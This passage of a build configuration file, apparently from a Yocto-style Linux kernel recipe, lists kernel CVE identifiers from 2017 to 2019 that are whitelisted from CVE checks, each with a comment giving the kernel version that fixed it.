2779# fixed-version: Fixed after version 4.11rc2
2780CVE_CHECK_WHITELIST += "CVE-2017-6874"
2781
2782# fixed-version: Fixed after version 3.18rc1
2783CVE_CHECK_WHITELIST += "CVE-2017-6951"
2784
2785# fixed-version: Fixed after version 4.11rc5
2786CVE_CHECK_WHITELIST += "CVE-2017-7184"
2787
2788# fixed-version: Fixed after version 4.11rc5
2789CVE_CHECK_WHITELIST += "CVE-2017-7187"
2790
2791# fixed-version: Fixed after version 4.11rc6
2792CVE_CHECK_WHITELIST += "CVE-2017-7261"
2793
2794# fixed-version: Fixed after version 4.10rc4
2795CVE_CHECK_WHITELIST += "CVE-2017-7273"
2796
2797# fixed-version: Fixed after version 4.11rc4
2798CVE_CHECK_WHITELIST += "CVE-2017-7277"
2799
2800# fixed-version: Fixed after version 4.11rc6
2801CVE_CHECK_WHITELIST += "CVE-2017-7294"
2802
2803# fixed-version: Fixed after version 4.11rc6
2804CVE_CHECK_WHITELIST += "CVE-2017-7308"
2805
2806# fixed-version: Fixed after version 4.12rc5
2807CVE_CHECK_WHITELIST += "CVE-2017-7346"
2808
2809# CVE-2017-7369 has no known resolution
2810
2811# fixed-version: Fixed after version 4.11rc4
2812CVE_CHECK_WHITELIST += "CVE-2017-7374"
2813
2814# fixed-version: Fixed after version 4.11rc8
2815CVE_CHECK_WHITELIST += "CVE-2017-7472"
2816
2817# fixed-version: Fixed after version 4.11
2818CVE_CHECK_WHITELIST += "CVE-2017-7477"
2819
2820# fixed-version: Fixed after version 4.12rc7
2821CVE_CHECK_WHITELIST += "CVE-2017-7482"
2822
2823# fixed-version: Fixed after version 4.12rc1
2824CVE_CHECK_WHITELIST += "CVE-2017-7487"
2825
2826# fixed-version: Fixed after version 4.7rc1
2827CVE_CHECK_WHITELIST += "CVE-2017-7495"
2828
2829# fixed-version: Fixed after version 4.12rc7
2830CVE_CHECK_WHITELIST += "CVE-2017-7518"
2831
2832# fixed-version: Fixed after version 4.13rc1
2833CVE_CHECK_WHITELIST += "CVE-2017-7533"
2834
2835# fixed-version: Fixed after version 4.13rc1
2836CVE_CHECK_WHITELIST += "CVE-2017-7541"
2837
2838# fixed-version: Fixed after version 4.13rc2
2839CVE_CHECK_WHITELIST += "CVE-2017-7542"
2840
2841# fixed-version: Fixed after version 4.13
2842CVE_CHECK_WHITELIST += "CVE-2017-7558"
2843
2844# fixed-version: Fixed after version 4.11rc6
2845CVE_CHECK_WHITELIST += "CVE-2017-7616"
2846
2847# fixed-version: Fixed after version 4.11rc8
2848CVE_CHECK_WHITELIST += "CVE-2017-7618"
2849
2850# fixed-version: Fixed after version 4.11
2851CVE_CHECK_WHITELIST += "CVE-2017-7645"
2852
2853# fixed-version: Fixed after version 4.11rc7
2854CVE_CHECK_WHITELIST += "CVE-2017-7889"
2855
2856# fixed-version: Fixed after version 4.11
2857CVE_CHECK_WHITELIST += "CVE-2017-7895"
2858
2859# fixed-version: Fixed after version 4.11rc8
2860CVE_CHECK_WHITELIST += "CVE-2017-7979"
2861
2862# fixed-version: Fixed after version 4.11rc4
2863CVE_CHECK_WHITELIST += "CVE-2017-8061"
2864
2865# fixed-version: Fixed after version 4.11rc2
2866CVE_CHECK_WHITELIST += "CVE-2017-8062"
2867
2868# fixed-version: Fixed after version 4.11rc1
2869CVE_CHECK_WHITELIST += "CVE-2017-8063"
2870
2871# fixed-version: Fixed after version 4.11rc1
2872CVE_CHECK_WHITELIST += "CVE-2017-8064"
2873
2874# fixed-version: Fixed after version 4.11rc1
2875CVE_CHECK_WHITELIST += "CVE-2017-8065"
2876
2877# fixed-version: Fixed after version 4.11rc1
2878CVE_CHECK_WHITELIST += "CVE-2017-8066"
2879
2880# fixed-version: Fixed after version 4.11rc1
2881CVE_CHECK_WHITELIST += "CVE-2017-8067"
2882
2883# fixed-version: Fixed after version 4.10rc8
2884CVE_CHECK_WHITELIST += "CVE-2017-8068"
2885
2886# fixed-version: Fixed after version 4.10rc8
2887CVE_CHECK_WHITELIST += "CVE-2017-8069"
2888
2889# fixed-version: Fixed after version 4.10rc8
2890CVE_CHECK_WHITELIST += "CVE-2017-8070"
2891
2892# fixed-version: Fixed after version 4.10rc7
2893CVE_CHECK_WHITELIST += "CVE-2017-8071"
2894
2895# fixed-version: Fixed after version 4.10rc7
2896CVE_CHECK_WHITELIST += "CVE-2017-8072"
2897
2898# fixed-version: Fixed after version 3.16rc1
2899CVE_CHECK_WHITELIST += "CVE-2017-8106"
2900
2901# fixed-version: Fixed after version 3.19rc6
2902CVE_CHECK_WHITELIST += "CVE-2017-8240"
2903
2904# CVE-2017-8242 has no known resolution
2905
2906# CVE-2017-8244 has no known resolution
2907
2908# CVE-2017-8245 has no known resolution
2909
2910# CVE-2017-8246 has no known resolution
2911
2912# fixed-version: Fixed after version 4.12rc1
2913CVE_CHECK_WHITELIST += "CVE-2017-8797"
2914
2915# fixed-version: Fixed after version 4.15rc3
2916CVE_CHECK_WHITELIST += "CVE-2017-8824"
2917
2918# fixed-version: Fixed after version 4.13rc1
2919CVE_CHECK_WHITELIST += "CVE-2017-8831"
2920
2921# fixed-version: Fixed after version 4.12rc1
2922CVE_CHECK_WHITELIST += "CVE-2017-8890"
2923
2924# fixed-version: Fixed after version 4.11rc2
2925CVE_CHECK_WHITELIST += "CVE-2017-8924"
2926
2927# fixed-version: Fixed after version 4.11rc2
2928CVE_CHECK_WHITELIST += "CVE-2017-8925"
2929
2930# fixed-version: Fixed after version 4.12rc1
2931CVE_CHECK_WHITELIST += "CVE-2017-9059"
2932
2933# fixed-version: Fixed after version 4.12rc2
2934CVE_CHECK_WHITELIST += "CVE-2017-9074"
2935
2936# fixed-version: Fixed after version 4.12rc2
2937CVE_CHECK_WHITELIST += "CVE-2017-9075"
2938
2939# fixed-version: Fixed after version 4.12rc2
2940CVE_CHECK_WHITELIST += "CVE-2017-9076"
2941
2942# fixed-version: Fixed after version 4.12rc2
2943CVE_CHECK_WHITELIST += "CVE-2017-9077"
2944
2945# fixed-version: Fixed after version 4.12rc1
2946CVE_CHECK_WHITELIST += "CVE-2017-9150"
2947
2948# fixed-version: Fixed after version 4.12rc3
2949CVE_CHECK_WHITELIST += "CVE-2017-9211"
2950
2951# fixed-version: Fixed after version 4.12rc3
2952CVE_CHECK_WHITELIST += "CVE-2017-9242"
2953
2954# fixed-version: Fixed after version 4.12rc5
2955CVE_CHECK_WHITELIST += "CVE-2017-9605"
2956
2957# fixed-version: Fixed after version 4.3rc7
2958CVE_CHECK_WHITELIST += "CVE-2017-9725"
2959
2960# fixed-version: Fixed after version 4.13rc1
2961CVE_CHECK_WHITELIST += "CVE-2017-9984"
2962
2963# fixed-version: Fixed after version 4.13rc1
2964CVE_CHECK_WHITELIST += "CVE-2017-9985"
2965
2966# fixed-version: Fixed after version 4.15rc1
2967CVE_CHECK_WHITELIST += "CVE-2017-9986"
2968
2969# fixed-version: Fixed after version 4.15rc9
2970CVE_CHECK_WHITELIST += "CVE-2018-1000004"
2971
2972# fixed-version: Fixed after version 4.16rc1
2973CVE_CHECK_WHITELIST += "CVE-2018-1000026"
2974
2975# fixed-version: Fixed after version 4.15
2976CVE_CHECK_WHITELIST += "CVE-2018-1000028"
2977
2978# fixed-version: Fixed after version 4.16
2979CVE_CHECK_WHITELIST += "CVE-2018-1000199"
2980
2981# fixed-version: Fixed after version 4.17rc5
2982CVE_CHECK_WHITELIST += "CVE-2018-1000200"
2983
2984# fixed-version: Fixed after version 4.17rc7
2985CVE_CHECK_WHITELIST += "CVE-2018-1000204"
2986
2987# fixed-version: Fixed after version 4.16rc7
2988CVE_CHECK_WHITELIST += "CVE-2018-10021"
2989
2990# fixed-version: Fixed after version 4.16rc7
2991CVE_CHECK_WHITELIST += "CVE-2018-10074"
2992
2993# fixed-version: Fixed after version 4.13rc1
2994CVE_CHECK_WHITELIST += "CVE-2018-10087"
2995
2996# fixed-version: Fixed after version 4.13rc1
2997CVE_CHECK_WHITELIST += "CVE-2018-10124"
2998
2999# fixed-version: Fixed after version 4.17rc4
3000CVE_CHECK_WHITELIST += "CVE-2018-10322"
3001
3002# fixed-version: Fixed after version 4.17rc4
3003CVE_CHECK_WHITELIST += "CVE-2018-10323"
3004
3005# fixed-version: Fixed after version 4.16rc3
3006CVE_CHECK_WHITELIST += "CVE-2018-1065"
3007
3008# fixed-version: Fixed after version 4.11rc1
3009CVE_CHECK_WHITELIST += "CVE-2018-1066"
3010
3011# fixed-version: Fixed after version 4.13rc6
3012CVE_CHECK_WHITELIST += "CVE-2018-10675"
3013
3014# fixed-version: Fixed after version 4.16rc5
3015CVE_CHECK_WHITELIST += "CVE-2018-1068"
3016
3017# fixed-version: Fixed after version 4.18rc1
3018CVE_CHECK_WHITELIST += "CVE-2018-10840"
3019
3020# fixed-version: Fixed after version 4.18rc1
3021CVE_CHECK_WHITELIST += "CVE-2018-10853"
3022
3023# fixed-version: Fixed after version 4.16rc7
3024CVE_CHECK_WHITELIST += "CVE-2018-1087"
3025
3026# CVE-2018-10872 has no known resolution
3027
3028# fixed-version: Fixed after version 4.18rc4
3029CVE_CHECK_WHITELIST += "CVE-2018-10876"
3030
3031# fixed-version: Fixed after version 4.18rc4
3032CVE_CHECK_WHITELIST += "CVE-2018-10877"
3033
3034# fixed-version: Fixed after version 4.18rc4
3035CVE_CHECK_WHITELIST += "CVE-2018-10878"
3036
3037# fixed-version: Fixed after version 4.18rc4
3038CVE_CHECK_WHITELIST += "CVE-2018-10879"
3039
3040# fixed-version: Fixed after version 4.18rc4
3041CVE_CHECK_WHITELIST += "CVE-2018-10880"
3042
3043# fixed-version: Fixed after version 4.18rc4
3044CVE_CHECK_WHITELIST += "CVE-2018-10881"
3045
3046# fixed-version: Fixed after version 4.18rc4
3047CVE_CHECK_WHITELIST += "CVE-2018-10882"
3048
3049# fixed-version: Fixed after version 4.18rc4
3050CVE_CHECK_WHITELIST += "CVE-2018-10883"
3051
3052# fixed-version: Fixed after version 2.6.36rc1
3053CVE_CHECK_WHITELIST += "CVE-2018-10901"
3054
3055# fixed-version: Fixed after version 4.18rc6
3056CVE_CHECK_WHITELIST += "CVE-2018-10902"
3057
3058# fixed-version: Fixed after version 4.14rc2
3059CVE_CHECK_WHITELIST += "CVE-2018-1091"
3060
3061# fixed-version: Fixed after version 4.17rc1
3062CVE_CHECK_WHITELIST += "CVE-2018-1092"
3063
3064# fixed-version: Fixed after version 4.17rc1
3065CVE_CHECK_WHITELIST += "CVE-2018-1093"
3066
3067# fixed-version: Fixed after version 4.13rc5
3068CVE_CHECK_WHITELIST += "CVE-2018-10938"
3069
3070# fixed-version: Fixed after version 4.17rc1
3071CVE_CHECK_WHITELIST += "CVE-2018-1094"
3072
3073# fixed-version: Fixed after version 4.17rc3
3074CVE_CHECK_WHITELIST += "CVE-2018-10940"
3075
3076# fixed-version: Fixed after version 4.17rc1
3077CVE_CHECK_WHITELIST += "CVE-2018-1095"
3078
3079# fixed-version: Fixed after version 4.17rc2
3080CVE_CHECK_WHITELIST += "CVE-2018-1108"
3081
3082# fixed-version: Fixed after version 4.18rc1
3083CVE_CHECK_WHITELIST += "CVE-2018-1118"
3084
3085# fixed-version: Fixed after version 4.17rc6
3086CVE_CHECK_WHITELIST += "CVE-2018-1120"
3087
3088# CVE-2018-1121 has no known resolution
3089
3090# fixed-version: Fixed after version 4.11rc1
3091CVE_CHECK_WHITELIST += "CVE-2018-11232"
3092
3093# fixed-version: Fixed after version 4.19rc1
3094CVE_CHECK_WHITELIST += "CVE-2018-1128"
3095
3096# fixed-version: Fixed after version 4.19rc1
3097CVE_CHECK_WHITELIST += "CVE-2018-1129"
3098
3099# fixed-version: Fixed after version 4.16rc7
3100CVE_CHECK_WHITELIST += "CVE-2018-1130"
3101
3102# fixed-version: Fixed after version 4.18rc1
3103CVE_CHECK_WHITELIST += "CVE-2018-11412"
3104
3105# fixed-version: Fixed after version 4.17rc7
3106CVE_CHECK_WHITELIST += "CVE-2018-11506"
3107
3108# fixed-version: Fixed after version 4.17rc5
3109CVE_CHECK_WHITELIST += "CVE-2018-11508"
3110
3111# CVE-2018-11987 has no known resolution
3112
3113# fixed-version: Fixed after version 5.2rc1
3114CVE_CHECK_WHITELIST += "CVE-2018-12126"
3115
3116# fixed-version: Fixed after version 5.2rc1
3117CVE_CHECK_WHITELIST += "CVE-2018-12127"
3118
3119# fixed-version: Fixed after version 5.2rc1
3120CVE_CHECK_WHITELIST += "CVE-2018-12130"
3121
3122# fixed-version: Fixed after version 5.4rc2
3123CVE_CHECK_WHITELIST += "CVE-2018-12207"
3124
3125# fixed-version: Fixed after version 4.18rc1
3126CVE_CHECK_WHITELIST += "CVE-2018-12232"
3127
3128# fixed-version: Fixed after version 4.18rc2
3129CVE_CHECK_WHITELIST += "CVE-2018-12233"
3130
3131# fixed-version: Fixed after version 4.18rc1
3132CVE_CHECK_WHITELIST += "CVE-2018-12633"
3133
3134# fixed-version: Fixed after version 4.18rc2
3135CVE_CHECK_WHITELIST += "CVE-2018-12714"
3136
3137# fixed-version: Fixed after version 4.19rc1
3138CVE_CHECK_WHITELIST += "CVE-2018-12896"
3139
3140# fixed-version: Fixed after version 4.18rc1
3141CVE_CHECK_WHITELIST += "CVE-2018-12904"
3142
3143# CVE-2018-12928 has no known resolution
3144
3145# CVE-2018-12929 has no known resolution
3146
3147# CVE-2018-12930 has no known resolution
3148
3149# CVE-2018-12931 has no known resolution
3150
3151# fixed-version: Fixed after version 4.19rc1
3152CVE_CHECK_WHITELIST += "CVE-2018-13053"
3153
3154# fixed-version: Fixed after version 4.18rc1
3155CVE_CHECK_WHITELIST += "CVE-2018-13093"
3156
3157# fixed-version: Fixed after version 4.18rc1
3158CVE_CHECK_WHITELIST += "CVE-2018-13094"
3159
3160# fixed-version: Fixed after version 4.18rc3
3161CVE_CHECK_WHITELIST += "CVE-2018-13095"
3162
3163# fixed-version: Fixed after version 4.19rc1
3164CVE_CHECK_WHITELIST += "CVE-2018-13096"
3165
3166# fixed-version: Fixed after version 4.19rc1
3167CVE_CHECK_WHITELIST += "CVE-2018-13097"
3168
3169# fixed-version: Fixed after version 4.19rc1
3170CVE_CHECK_WHITELIST += "CVE-2018-13098"
3171
3172# fixed-version: Fixed after version 4.19rc1
3173CVE_CHECK_WHITELIST += "CVE-2018-13099"
3174
3175# fixed-version: Fixed after version 4.19rc1
3176CVE_CHECK_WHITELIST += "CVE-2018-13100"
3177
3178# fixed-version: Fixed after version 4.18rc4
3179CVE_CHECK_WHITELIST += "CVE-2018-13405"
3180
3181# fixed-version: Fixed after version 4.18rc1
3182CVE_CHECK_WHITELIST += "CVE-2018-13406"
3183
3184# fixed-version: Fixed after version 4.19rc1
3185CVE_CHECK_WHITELIST += "CVE-2018-14609"
3186
3187# fixed-version: Fixed after version 4.19rc1
3188CVE_CHECK_WHITELIST += "CVE-2018-14610"
3189
3190# fixed-version: Fixed after version 4.19rc1
3191CVE_CHECK_WHITELIST += "CVE-2018-14611"
3192
3193# fixed-version: Fixed after version 4.19rc1
3194CVE_CHECK_WHITELIST += "CVE-2018-14612"
3195
3196# fixed-version: Fixed after version 4.19rc1
3197CVE_CHECK_WHITELIST += "CVE-2018-14613"
3198
3199# fixed-version: Fixed after version 4.19rc1
3200CVE_CHECK_WHITELIST += "CVE-2018-14614"
3201
3202# fixed-version: Fixed after version 4.19rc1
3203CVE_CHECK_WHITELIST += "CVE-2018-14615"
3204
3205# fixed-version: Fixed after version 4.19rc1
3206CVE_CHECK_WHITELIST += "CVE-2018-14616"
3207
3208# fixed-version: Fixed after version 4.19rc1
3209CVE_CHECK_WHITELIST += "CVE-2018-14617"
3210
3211# fixed-version: Fixed after version 4.15rc4
3212CVE_CHECK_WHITELIST += "CVE-2018-14619"
3213
3214# fixed-version: Fixed after version 4.20rc6
3215CVE_CHECK_WHITELIST += "CVE-2018-14625"
3216
3217# fixed-version: Fixed after version 4.19rc6
3218CVE_CHECK_WHITELIST += "CVE-2018-14633"
3219
3220# fixed-version: Fixed after version 4.13rc1
3221CVE_CHECK_WHITELIST += "CVE-2018-14634"
3222
3223# fixed-version: Fixed after version 4.19rc4
3224CVE_CHECK_WHITELIST += "CVE-2018-14641"
3225
3226# fixed-version: Fixed after version 4.15rc8
3227CVE_CHECK_WHITELIST += "CVE-2018-14646"
3228
3229# fixed-version: Fixed after version 4.19rc2
3230CVE_CHECK_WHITELIST += "CVE-2018-14656"
3231
3232# fixed-version: Fixed after version 4.18rc8
3233CVE_CHECK_WHITELIST += "CVE-2018-14678"
3234
3235# fixed-version: Fixed after version 4.18rc1
3236CVE_CHECK_WHITELIST += "CVE-2018-14734"
3237
3238# fixed-version: Fixed after version 4.19rc7
3239CVE_CHECK_WHITELIST += "CVE-2018-15471"
3240
3241# fixed-version: Fixed after version 4.19rc1
3242CVE_CHECK_WHITELIST += "CVE-2018-15572"
3243
3244# fixed-version: Fixed after version 4.19rc1
3245CVE_CHECK_WHITELIST += "CVE-2018-15594"
3246
3247# fixed-version: Fixed after version 4.18rc5
3248CVE_CHECK_WHITELIST += "CVE-2018-16276"
3249
3250# fixed-version: Fixed after version 4.8rc1
3251CVE_CHECK_WHITELIST += "CVE-2018-16597"
3252
3253# fixed-version: Fixed after version 4.19rc2
3254CVE_CHECK_WHITELIST += "CVE-2018-16658"
3255
3256# fixed-version: Fixed after version 4.20rc5
3257CVE_CHECK_WHITELIST += "CVE-2018-16862"
3258
3259# fixed-version: Fixed after version 4.20rc3
3260CVE_CHECK_WHITELIST += "CVE-2018-16871"
3261
3262# fixed-version: Fixed after version 5.0rc5
3263CVE_CHECK_WHITELIST += "CVE-2018-16880"
3264
3265# fixed-version: Fixed after version 4.20
3266CVE_CHECK_WHITELIST += "CVE-2018-16882"
3267
3268# fixed-version: Fixed after version 5.0rc1
3269CVE_CHECK_WHITELIST += "CVE-2018-16884"
3270
3271# CVE-2018-16885 has no known resolution
3272
3273# fixed-version: Fixed after version 4.19rc4
3274CVE_CHECK_WHITELIST += "CVE-2018-17182"
3275
3276# fixed-version: Fixed after version 4.19rc7
3277CVE_CHECK_WHITELIST += "CVE-2018-17972"
3278
3279# CVE-2018-17977 has no known resolution
3280
3281# fixed-version: Fixed after version 4.19rc7
3282CVE_CHECK_WHITELIST += "CVE-2018-18021"
3283
3284# fixed-version: Fixed after version 4.19
3285CVE_CHECK_WHITELIST += "CVE-2018-18281"
3286
3287# fixed-version: Fixed after version 4.15rc6
3288CVE_CHECK_WHITELIST += "CVE-2018-18386"
3289
3290# fixed-version: Fixed after version 4.20rc5
3291CVE_CHECK_WHITELIST += "CVE-2018-18397"
3292
3293# fixed-version: Fixed after version 4.19rc7
3294CVE_CHECK_WHITELIST += "CVE-2018-18445"
3295
3296# fixed-version: Fixed after version 4.15rc2
3297CVE_CHECK_WHITELIST += "CVE-2018-18559"
3298
3299# CVE-2018-18653 has no known resolution
3300
3301# fixed-version: Fixed after version 4.17rc4
3302CVE_CHECK_WHITELIST += "CVE-2018-18690"
3303
3304# fixed-version: Fixed after version 4.20rc1
3305CVE_CHECK_WHITELIST += "CVE-2018-18710"
3306
3307# fixed-version: Fixed after version 4.20rc2
3308CVE_CHECK_WHITELIST += "CVE-2018-18955"
3309
3310# fixed-version: Fixed after version 4.20rc5
3311CVE_CHECK_WHITELIST += "CVE-2018-19406"
3312
3313# fixed-version: Fixed after version 4.20rc5
3314CVE_CHECK_WHITELIST += "CVE-2018-19407"
3315
3316# fixed-version: Fixed after version 4.20rc6
3317CVE_CHECK_WHITELIST += "CVE-2018-19824"
3318
3319# fixed-version: Fixed after version 4.20rc3
3320CVE_CHECK_WHITELIST += "CVE-2018-19854"
3321
3322# fixed-version: Fixed after version 4.20
3323CVE_CHECK_WHITELIST += "CVE-2018-19985"
3324
3325# fixed-version: Fixed after version 4.20rc6
3326CVE_CHECK_WHITELIST += "CVE-2018-20169"
3327
3328# fixed-version: Fixed after version 4.15rc2
3329CVE_CHECK_WHITELIST += "CVE-2018-20449"
3330
3331# fixed-version: Fixed after version 4.14rc1
3332CVE_CHECK_WHITELIST += "CVE-2018-20509"
3333
3334# fixed-version: Fixed after version 4.16rc3
3335CVE_CHECK_WHITELIST += "CVE-2018-20510"
3336
3337# fixed-version: Fixed after version 4.19rc5
3338CVE_CHECK_WHITELIST += "CVE-2018-20511"
3339
3340# fixed-version: Fixed after version 5.0rc1
3341CVE_CHECK_WHITELIST += "CVE-2018-20669"
3342
3343# fixed-version: Fixed after version 5.0rc1
3344CVE_CHECK_WHITELIST += "CVE-2018-20784"
3345
3346# fixed-version: Fixed after version 4.20rc1
3347CVE_CHECK_WHITELIST += "CVE-2018-20836"
3348
3349# fixed-version: Fixed after version 4.20rc1
3350CVE_CHECK_WHITELIST += "CVE-2018-20854"
3351
3352# fixed-version: Fixed after version 4.19rc1
3353CVE_CHECK_WHITELIST += "CVE-2018-20855"
3354
3355# fixed-version: Fixed after version 4.19rc1
3356CVE_CHECK_WHITELIST += "CVE-2018-20856"
3357
3358# fixed-version: Fixed after version 4.17rc1
3359CVE_CHECK_WHITELIST += "CVE-2018-20961"
3360
3361# fixed-version: Fixed after version 4.18rc1
3362CVE_CHECK_WHITELIST += "CVE-2018-20976"
3363
3364# fixed-version: Fixed after version 4.18rc1
3365CVE_CHECK_WHITELIST += "CVE-2018-21008"
3366
3367# fixed-version: Fixed after version 4.15rc9
3368CVE_CHECK_WHITELIST += "CVE-2018-25015"
3369
3370# fixed-version: Fixed after version 4.17rc7
3371CVE_CHECK_WHITELIST += "CVE-2018-25020"
3372
3373# CVE-2018-3574 has no known resolution
3374
3375# fixed-version: Fixed after version 4.19rc1
3376CVE_CHECK_WHITELIST += "CVE-2018-3620"
3377
3378# fixed-version: Fixed after version 4.17rc7
3379CVE_CHECK_WHITELIST += "CVE-2018-3639"
3380
3381# fixed-version: Fixed after version 4.19rc1
3382CVE_CHECK_WHITELIST += "CVE-2018-3646"
3383
3384# fixed-version: Fixed after version 3.7rc1
3385CVE_CHECK_WHITELIST += "CVE-2018-3665"
3386
3387# fixed-version: Fixed after version 4.19rc1
3388CVE_CHECK_WHITELIST += "CVE-2018-3693"
3389
3390# fixed-version: Fixed after version 4.15rc8
3391CVE_CHECK_WHITELIST += "CVE-2018-5332"
3392
3393# fixed-version: Fixed after version 4.15rc8
3394CVE_CHECK_WHITELIST += "CVE-2018-5333"
3395
3396# fixed-version: Fixed after version 4.15rc8
3397CVE_CHECK_WHITELIST += "CVE-2018-5344"
3398
3399# fixed-version: Fixed after version 4.18rc7
3400CVE_CHECK_WHITELIST += "CVE-2018-5390"
3401
3402# fixed-version: Fixed after version 4.19rc1
3403CVE_CHECK_WHITELIST += "CVE-2018-5391"
3404
3405# fixed-version: Fixed after version 4.16rc5
3406CVE_CHECK_WHITELIST += "CVE-2018-5703"
3407
3408# fixed-version: Fixed after version 4.16rc1
3409CVE_CHECK_WHITELIST += "CVE-2018-5750"
3410
3411# fixed-version: Fixed after version 4.16rc1
3412CVE_CHECK_WHITELIST += "CVE-2018-5803"
3413
3414# fixed-version: Fixed after version 4.17rc6
3415CVE_CHECK_WHITELIST += "CVE-2018-5814"
3416
3417# fixed-version: Fixed after version 4.16rc1
3418CVE_CHECK_WHITELIST += "CVE-2018-5848"
3419
3420# Skipping CVE-2018-5856, no affected_versions
3421
3422# fixed-version: Fixed after version 4.11rc8
3423CVE_CHECK_WHITELIST += "CVE-2018-5873"
3424
3425# fixed-version: Fixed after version 4.15rc2
3426CVE_CHECK_WHITELIST += "CVE-2018-5953"
3427
3428# fixed-version: Fixed after version 4.15rc2
3429CVE_CHECK_WHITELIST += "CVE-2018-5995"
3430
3431# fixed-version: Fixed after version 4.16rc5
3432CVE_CHECK_WHITELIST += "CVE-2018-6412"
3433
3434# fixed-version: Fixed after version 4.17rc1
3435CVE_CHECK_WHITELIST += "CVE-2018-6554"
3436
3437# fixed-version: Fixed after version 4.17rc1
3438CVE_CHECK_WHITELIST += "CVE-2018-6555"
3439
3440# CVE-2018-6559 has no known resolution
3441
3442# fixed-version: Fixed after version 4.15rc9
3443CVE_CHECK_WHITELIST += "CVE-2018-6927"
3444
3445# fixed-version: Fixed after version 4.14rc6
3446CVE_CHECK_WHITELIST += "CVE-2018-7191"
3447
3448# fixed-version: Fixed after version 4.15rc2
3449CVE_CHECK_WHITELIST += "CVE-2018-7273"
3450
3451# fixed-version: Fixed after version 4.11rc1
3452CVE_CHECK_WHITELIST += "CVE-2018-7480"
3453
3454# fixed-version: Fixed after version 4.15rc3
3455CVE_CHECK_WHITELIST += "CVE-2018-7492"
3456
3457# fixed-version: Fixed after version 4.16rc2
3458CVE_CHECK_WHITELIST += "CVE-2018-7566"
3459
3460# fixed-version: Fixed after version 4.16rc7
3461CVE_CHECK_WHITELIST += "CVE-2018-7740"
3462
3463# fixed-version: Fixed after version 4.15rc2
3464CVE_CHECK_WHITELIST += "CVE-2018-7754"
3465
3466# fixed-version: Fixed after version 4.19rc5
3467CVE_CHECK_WHITELIST += "CVE-2018-7755"
3468
3469# fixed-version: Fixed after version 4.16rc1
3470CVE_CHECK_WHITELIST += "CVE-2018-7757"
3471
3472# fixed-version: Fixed after version 4.16rc5
3473CVE_CHECK_WHITELIST += "CVE-2018-7995"
3474
3475# fixed-version: Fixed after version 4.16rc1
3476CVE_CHECK_WHITELIST += "CVE-2018-8043"
3477
3478# fixed-version: Fixed after version 4.16rc1
3479CVE_CHECK_WHITELIST += "CVE-2018-8087"
3480
3481# fixed-version: Fixed after version 4.16rc7
3482CVE_CHECK_WHITELIST += "CVE-2018-8781"
3483
3484# fixed-version: Fixed after version 4.16rc7
3485CVE_CHECK_WHITELIST += "CVE-2018-8822"
3486
3487# fixed-version: Fixed after version 4.16rc7
3488CVE_CHECK_WHITELIST += "CVE-2018-8897"
3489
3490# fixed-version: Fixed after version 4.19rc1
3491CVE_CHECK_WHITELIST += "CVE-2018-9363"
3492
3493# fixed-version: Fixed after version 4.17rc3
3494CVE_CHECK_WHITELIST += "CVE-2018-9385"
3495
3496# fixed-version: Fixed after version 4.17rc3
3497CVE_CHECK_WHITELIST += "CVE-2018-9415"
3498
3499# fixed-version: Fixed after version 4.6rc1
3500CVE_CHECK_WHITELIST += "CVE-2018-9422"
3501
3502# fixed-version: Fixed after version 4.15rc6
3503CVE_CHECK_WHITELIST += "CVE-2018-9465"
3504
3505# fixed-version: Fixed after version 4.18rc5
3506CVE_CHECK_WHITELIST += "CVE-2018-9516"
3507
3508# fixed-version: Fixed after version 4.14rc1
3509CVE_CHECK_WHITELIST += "CVE-2018-9517"
3510
3511# fixed-version: Fixed after version 4.16rc3
3512CVE_CHECK_WHITELIST += "CVE-2018-9518"
3513
3514# fixed-version: Fixed after version 4.14rc4
3515CVE_CHECK_WHITELIST += "CVE-2018-9568"
3516
3517# fixed-version: Fixed after version 5.2rc6
3518CVE_CHECK_WHITELIST += "CVE-2019-0136"
3519
3520# fixed-version: Fixed after version 5.2rc1
3521CVE_CHECK_WHITELIST += "CVE-2019-0145"
3522
3523# fixed-version: Fixed after version 5.2rc1
3524CVE_CHECK_WHITELIST += "CVE-2019-0146"
3525
3526# fixed-version: Fixed after version 5.2rc1
3527CVE_CHECK_WHITELIST += "CVE-2019-0147"
3528
3529# fixed-version: Fixed after version 5.2rc1
3530CVE_CHECK_WHITELIST += "CVE-2019-0148"
3531
3532# fixed-version: Fixed after version 5.3rc1
3533CVE_CHECK_WHITELIST += "CVE-2019-0149"
3534
3535# fixed-version: Fixed after version 5.4rc8
3536CVE_CHECK_WHITELIST += "CVE-2019-0154"
3537
3538# fixed-version: Fixed after version 5.4rc8
3539CVE_CHECK_WHITELIST += "CVE-2019-0155"
3540
3541# fixed-version: Fixed after version 5.1rc1
3542CVE_CHECK_WHITELIST += "CVE-2019-10124"
3543
3544# fixed-version: Fixed after version 5.1rc1
3545CVE_CHECK_WHITELIST += "CVE-2019-10125"
3546
3547# fixed-version: Fixed after version 5.2rc6
3548CVE_CHECK_WHITELIST += "CVE-2019-10126"
3549
3550# CVE-2019-10140 has no known resolution
3551
3552# fixed-version: Fixed after version 5.2rc1
3553CVE_CHECK_WHITELIST += "CVE-2019-10142"
3554
3555# fixed-version: Fixed after version 5.3rc3
3556CVE_CHECK_WHITELIST += "CVE-2019-10207"
3557
3558# fixed-version: Fixed after version 5.4rc2
3559CVE_CHECK_WHITELIST += "CVE-2019-10220"
3560
3561# fixed-version: Fixed after version 5.2rc1
3562CVE_CHECK_WHITELIST += "CVE-2019-10638"
3563
3564# fixed-version: Fixed after version 5.1rc4
3565CVE_CHECK_WHITELIST += "CVE-2019-10639"
3566
3567# fixed-version: Fixed after version 5.0rc3
3568CVE_CHECK_WHITELIST += "CVE-2019-11085"
3569
3570# fixed-version: Fixed after version 5.2rc1
3571CVE_CHECK_WHITELIST += "CVE-2019-11091"
3572
3573# fixed-version: Fixed after version 5.4rc8
3574CVE_CHECK_WHITELIST += "CVE-2019-11135"
3575
3576# fixed-version: Fixed after version 4.8rc5
3577CVE_CHECK_WHITELIST += "CVE-2019-11190"
3578
3579# fixed-version: Fixed after version 5.1rc1
3580CVE_CHECK_WHITELIST += "CVE-2019-11191"
3581
3582# fixed-version: Fixed after version 5.3rc4
3583CVE_CHECK_WHITELIST += "CVE-2019-1125"
3584
3585# fixed-version: Fixed after version 5.2rc6
3586CVE_CHECK_WHITELIST += "CVE-2019-11477"
3587
3588# fixed-version: Fixed after version 5.2rc6
3589CVE_CHECK_WHITELIST += "CVE-2019-11478"
3590
3591# fixed-version: Fixed after version 5.2rc6
3592CVE_CHECK_WHITELIST += "CVE-2019-11479"
3593
3594# fixed-version: Fixed after version 5.1rc4
3595CVE_CHECK_WHITELIST += "CVE-2019-11486"
3596
